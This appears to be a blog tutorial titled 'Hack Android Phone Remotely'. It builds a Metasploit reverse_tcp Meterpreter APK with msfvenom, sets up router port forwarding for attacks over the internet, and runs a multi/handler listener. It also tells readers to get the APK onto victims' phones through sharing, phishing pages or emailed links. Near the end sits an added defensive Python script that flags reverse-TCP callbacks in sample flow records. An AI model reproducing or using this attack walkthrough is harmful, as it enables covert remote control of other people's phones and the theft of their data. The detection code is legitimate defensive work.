Hack Android Phone Remotely !!!

  • May 8th, 2017
  • Posted by: distroworld
  • Category: Android

Welcome back, my dear hackers. Let's learn to hack an Android phone using Kali Linux/BackTrack.

Before we start, let's get familiar with some terms that will be used during our hacking attempt.

Beginning with:

Metasploit = A tool for developing and executing exploit code against a remote target machine.

Meterpreter = A dynamically extensible payload that uses in-memory DLL injection and is extended over the network at runtime.

Msfconsole = An "all-in-one" Metasploit Framework console that gives you efficient access to virtually all of the options available in the MSF, such as the payloads.

Note: Words written inside // – – – – – – – – – – // are only comments. Please don't get confused.

Requirements:
Software requirements = Kali Linux or BackTrack, Metasploit (built into Kali/BackTrack), a universal serial bus (USB) tool, Rufus

 

Step 1:-
First of all, put your Kali or BackTrack image on a USB drive using the universal serial bus tool or any other tool. Here I will use Kali Linux.
Boot Kali live and open a terminal.

 

Step 2:-

Type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – –

Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 R LPORT=4044 -o /var/droidhack.apk
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – –

 

Here is what each part of the command means:

1. msfvenom = creates a payload

2. -p = specifies the type of payload

3. android = the operating system or type of device

4. meterpreter = the part of Metasploit that provides an extensible payload

5. reverse_tcp = we set up a listener first on our device, the target machine acts as a client connecting to it, and then finally we receive the shell

6. LHOST=192.168.0.104

NOTE: This is my IP. It can be different in your case. You can check yours by typing ifconfig in the terminal. Moreover, remember that this attack only works on a LAN. To run this attack over a WAN, you need to do port forwarding.

 

For WAN (Wide Area Network, i.e. global) attacking: specify the public IP address provided by your ISP; you can check your public IP at https://www.whatismyip.com/. You also need to do port forwarding.

Port Forwarding:
I have a TP-LINK router; almost every router has the same interface. So we will learn port forwarding using TP-Link as the example.
(a). First check your gateway IP and private IP in the terminal by typing

– – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – –
ifconfig
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – –

Now copy your default gateway IP and paste it into your browser. You will be asked to enter a username and password.
Enter the default username = admin and password = admin
If you have changed the router password, enter your own credentials.
Now look at the menu on the left, click on Forwarding and go to Virtual Servers.
Set the following values:

 

Service Port= 4044                         // enter your port you want to use //

Internal port= 4044                       // same as above //

IP Address = 192.168.0.104       // your IP //

Protocol= set to ALL

Status= Enabled

Common Service Port =                 //leave it to default setting //

Save it and close the page in the browser.

7. LPORT=4044

8. -o = output location of the file, including its name (droidhack.apk)

Hit enter.

Now you will see in the terminal

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
No platform was —————-            // some message of this type //

– – – – – – – – – – –

– – – – – – – –
Payload size :100 bytes           // any no. of bytes

Saved as : – – – –
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

After doing this,

either simply place the droidhack.apk file on someone's phone via sharing, or give the
victim a link which will download the droidhack.apk file to their phone.
You can use the following website for creating a live link

http://wikisend.com/

Upload your payload and get your link. Now redirect the victim to the link through a phishing page, or mail the link to them.

 

Step 3:- type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – — – –
Msfconsole
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – — – – – – – – – – – – – – –

Now the Metasploit Framework will open. Type the following commands

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – –
Msf use multi/handler

Msf exploit(handler) set payload android/meterpreter/reverse_tcp  // here you must enter your ip address ,as you are a listener now.You want to fetch data from victim device.//

Msf exploit(handler) set LHOST 192.168.0.104

Msf exploit(handler) set LPORT 4044

Msf exploit(handler) exploit
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – – – –
Now your machine is listening for the victim. When the victim installs the droidhack.apk file on their Android phone, you will find that a session has been opened.
Now you can do what you want.

For help or command list

Type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – –

?
// or //

-h
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – — – – – – – – – – – – – – –
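Seen from the network, the reverse_tcp callback described above is a phone opening outbound TCP sessions to a port phones do not normally use, on a LAN workstation or on an external host it keeps returning to. The following is an added example, not part of the original post, that flags this pattern in flow records; the record format, the phone address pool, the expected-port list and the repeat threshold are assumptions, and the sample records are constructed.

```python
from collections import Counter
from ipaddress import ip_address as ip, ip_network as net

# Assumptions for this example (not from the post): LAN range, the DHCP pool
# given to phones, the gateway, ports phones normally use, repeat threshold.
LAN = net("192.168.0.0/24")
PHONE_POOL = net("192.168.0.128/25")
GATEWAY = ip("192.168.0.1")
EXPECTED_PORTS = {53, 80, 123, 443, 5228}
MIN_REPEATS = 3

# Constructed flow records: "epoch src_ip dst_ip dst_port proto"
SAMPLE_FLOWS = """\
1494230400 192.168.0.150 198.51.100.20 443 tcp
1494230405 192.168.0.150 192.168.0.104 4044 tcp
1494230410 192.168.0.151 203.0.113.7 4044 tcp
1494230470 192.168.0.151 203.0.113.7 4044 tcp
1494230530 192.168.0.151 203.0.113.7 4044 tcp
1494230540 192.168.0.152 203.0.113.9 8080 tcp
1494230545 192.168.0.20 192.168.0.104 4044 tcp
1494230550 192.168.0.150 192.168.0.1 8443 tcp
truncated record
"""

def parse_flows(text):
    """Yield (src, dst, dport) for well-formed TCP records; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[4].lower() != "tcp":
            continue
        try:
            yield ip(parts[1]), ip(parts[2]), int(parts[3])
        except ValueError:
            continue

def suspicious_callbacks(text):
    """Flag phones opening TCP sessions on ports phones do not normally use."""
    counts = Counter(f for f in parse_flows(text) if f[0] in PHONE_POOL
                     and f[2] not in EXPECTED_PORTS and f[1] != GATEWAY)
    findings = []
    for (src, dst, dport), n in sorted(counts.items(), key=str):
        # One session to a LAN peer is already odd; external needs repeats.
        if dst in LAN or n >= MIN_REPEATS:
            reason = "lan-peer" if dst in LAN else "repeated"
            findings.append((str(src), str(dst), dport, n, reason))
    return findings

if __name__ == "__main__":
    print(*suspicious_callbacks(SAMPLE_FLOWS), sep="\n")
```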

So don't just read. Try it and learn how this works.

Don't use this for evil purposes. It is intended to help you learn.

Thanks for reading, keep sharing.
